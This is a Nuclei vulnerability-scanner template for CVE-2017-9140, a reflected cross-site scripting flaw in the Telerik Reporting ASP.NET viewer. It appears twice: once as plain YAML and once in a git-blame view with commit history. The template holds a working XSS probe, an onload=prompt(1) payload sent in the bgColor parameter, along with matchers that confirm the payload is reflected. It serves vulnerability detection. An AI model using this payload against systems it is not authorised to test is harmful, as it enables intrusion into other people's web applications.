nuclei-templates/cves/2017/CVE-2017-9140.yaml

id: CVE-2017-9140

info:
  name: Reflected XSS - Telerik Reporting Module
  author: dhiyaneshDk
  severity: medium
  description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
  reference:
    - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9140
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-9140
    cwe-id: CWE-79
  remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
  tags: cve,cve2017,xss,telerik

requests:
  - method: GET
    path:
      - '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '#000000"onload="prompt(1)'
          - 'Telerik.ReportViewer.axd?name=Resources'
        condition: and

# Enhanced by cs on 2022/02/28
Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00			`id: CVE-2017-9140`

			`info:`
Minor updates 2021-06-09 16:07:22 +00:00			`name: Reflected XSS - Telerik Reporting Module`
Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00			`author: dhiyaneshDk`
			`severity: medium`
Enhancement: cves/2017/CVE-2017-9140.yaml by cs 2022-02-28 14:33:03 +00:00			`description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.`
Enhancement: cves/2021/CVE-2021-43287.yaml by mp 2022-02-28 18:19:21 +00:00			`reference:`
Enhancement: cves/2017/CVE-2017-9140.yaml by cs 2022-02-28 14:33:03 +00:00			`- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module`
			`- https://nvd.nist.gov/vuln/detail/CVE-2017-9140`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-9140`
			`cwe-id: CWE-79`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.`
			`tags: cve,cve2017,xss,telerik`
Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'`
Minor updates 2021-06-09 16:07:22 +00:00
			`matchers-condition: and`
Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00			`matchers:`
Minor updates 2021-06-09 16:07:22 +00:00			`- type: status`
			`status:`
			`- 200`

Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00			`- type: word`
			`words:`
Minor updates 2021-06-09 16:07:22 +00:00			`- '#000000"onload="prompt(1)'`
			`- 'Telerik.ReportViewer.axd?name=Resources'`
Create CVE-2017-9140.yaml 2021-06-09 13:10:47 +00:00			`condition: and`
Enhancement: cves/2017/CVE-2017-9140.yaml by cs 2022-02-28 14:33:03 +00:00
			`# Enhanced by cs on 2022/02/28`